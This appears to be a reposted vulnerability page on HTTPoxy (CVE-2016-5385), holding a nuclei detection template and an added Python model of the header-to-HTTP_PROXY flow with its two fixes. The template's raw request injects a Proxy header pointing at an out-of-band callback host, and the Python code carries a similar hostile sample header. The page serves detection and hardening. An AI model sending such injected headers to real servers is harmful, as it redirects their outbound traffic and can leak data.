HTTPoxy - Proxy Header to HTTP_PROXY Env Injection

Vulnerability Information

Vulnerability name: HTTPoxy - Proxy Header to HTTP_PROXY Env Injection

Vulnerability ID:

  • CVE: CVE-2016-5385

Vulnerability type: Server-side request forgery

Severity: High

Description: HTTPoxy affects CGI-based applications that use environment variables. When a Proxy header is supplied in a request, it can be translated into the HTTP_PROXY environment variable, which is read by various libraries (such as Guzzle, curl, requests), allowing an attacker to redirect the application's outbound traffic to a server they control. Typical affected deployments include widely used web servers and applications, especially in environments using PHP and FastCGI. The technical root cause is improper input validation: a maliciously crafted HTTP header is misinterpreted as an environment variable. This can lead to serious security risks, including data leakage and service disruption, because an attacker can manipulate the behavior of server-side HTTP clients to exfiltrate data or redirect traffic through a malicious proxy. Notably, the attack requires no authentication and can be exploited automatically, so the threat to affected systems is particularly severe.

Product: CGI-based applications

Source: https://github.com/projectdiscovery/nuclei-templates/blob/e0fa7e8642c0e7274eebcad45d95af9ba4b6785b/http%2Fcves%2F2016%2FCVE-2016-5385.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details

id: CVE-2016-5385

info:
  name: HTTPoxy - Proxy Header to HTTP_PROXY Env Injection
  author: oxqnd
  severity: high
  description: |
    HTTPoxy is a vulnerability affecting CGI-based applications using environment variables.
    When a Proxy header is supplied, it can be translated to the HTTP_PROXY environment variable,
    which is used by various libraries (e.g. Guzzle, curl, requests), allowing attackers to redirect
    outbound traffic to a server they control.
  impact: |
    Attackers can manipulate server-side HTTP client behavior to leak data or redirect traffic
    through malicious proxies.
  remediation: |
    Unset the HTTP_PROXY environment variable before request handling or block the Proxy header at the web server.
  reference:
    - https://httpoxy.org/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-5385
    - https://bugzilla.redhat.com/show_bug.cgi?id=1353794
    - https://github.com/guzzle/guzzle/releases/tag/6.2.1
  classification:
    cve-id: CVE-2016-5385
    cwe-id: CWE-601
    cvss-score: 8.1
  tags: cve,cve2016,httpoxy,env,guzzle,proxy,php,fastcgi,header-injection

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Proxy: http://{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: status
        status:
          - 200
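The data flow that the description above explains (request header, CGI meta-variable, HTTP client picking its proxy) and the two fixes named under remediation in the template, modelled as an added Python example. This is not code from the original page or from the nuclei-templates project; the helper names (cgi_meta_variables, sanitize_cgi_env, strip_proxy_header and the two pipeline functions), the sample headers and the proxy addresses are constructed for this example. The example also keeps a legitimately configured lowercase http_proxy working, which the page does not spell out but which is why the fix removes only the header-derived uppercase spelling.

```python
"""Added example (not part of the page or the nuclei template): models the
HTTPoxy data flow so the risk and both remediations can be checked offline.

  client request --CGI/FastCGI gateway--> environment --HTTP client--> proxy

All function names and sample values here are constructed for illustration.
"""
from typing import Dict, Optional, Tuple

# Constructed sample requests: a normal one and one carrying the Proxy header
# that the nuclei template above sends (with a reserved .invalid hostname).
BENIGN_HEADERS = {"Host": "app.example.internal", "User-Agent": "curl/8.0"}
HOSTILE_HEADERS = {"Host": "app.example.internal", "Proxy": "http://proxy.invalid:8080"}


def cgi_meta_variables(headers: Dict[str, str]) -> Dict[str, str]:
    """Translate request headers into CGI meta-variables as RFC 3875 (CGI/1.1)
    prescribes: upper-case, '-' becomes '_', prefixed with HTTP_.  This is
    legitimate gateway behaviour; HTTPoxy exists because 'Proxy' collides with
    the HTTP_PROXY variable that HTTP client libraries trust."""
    env = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def proxy_for_outbound(env: Dict[str, str]) -> Optional[str]:
    """Mimic a pre-fix HTTP client that reads its outbound proxy from the
    environment without asking where HTTP_PROXY came from."""
    return env.get("HTTP_PROXY") or env.get("http_proxy")


# Remediation 1 from the template: unset HTTP_PROXY before request handling.
def sanitize_cgi_env(env: Dict[str, str]) -> Dict[str, str]:
    """Drop only the uppercase, header-derived spelling.  A lowercase
    http_proxy set by the operator is real configuration and is kept."""
    clean = dict(env)
    clean.pop("HTTP_PROXY", None)
    return clean


# Remediation 2 from the template: block the Proxy header at the web server
# (what 'RequestHeader unset Proxy early' in Apache or
# 'fastcgi_param HTTP_PROXY "";' in nginx achieve, per httpoxy.org).
def strip_proxy_header(headers: Dict[str, str]) -> Tuple[Dict[str, str], bool]:
    """Return the filtered headers and a flag the server can log or alert on,
    since a Proxy request header has no legitimate client use."""
    stripped = {k: v for k, v in headers.items() if k.lower() != "proxy"}
    return stripped, len(stripped) != len(headers)


def outbound_proxy_vulnerable(headers: Dict[str, str]) -> Optional[str]:
    """Unpatched pipeline: header -> environment -> client."""
    return proxy_for_outbound(cgi_meta_variables(headers))


def outbound_proxy_hardened(headers: Dict[str, str]) -> Optional[str]:
    """Both mitigations applied: header filtered at the server, variable unset
    in the application before any outbound request is made."""
    headers, _ = strip_proxy_header(headers)
    return proxy_for_outbound(sanitize_cgi_env(cgi_meta_variables(headers)))


if __name__ == "__main__":
    print("vulnerable:", outbound_proxy_vulnerable(HOSTILE_HEADERS))  # http://proxy.invalid:8080
    print("hardened:  ", outbound_proxy_hardened(HOSTILE_HEADERS))    # None
```

Either mitigation alone closes the hole; applying both gives defence in depth, and the flag returned by strip_proxy_header is the natural hook for logging the attempt at the edge, which is also how the template's interactsh callback would be spotted from the defender's side.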

http://example.com/2025/08/03/github_2532100570/
Author
lianccc
Published on
August 3, 2025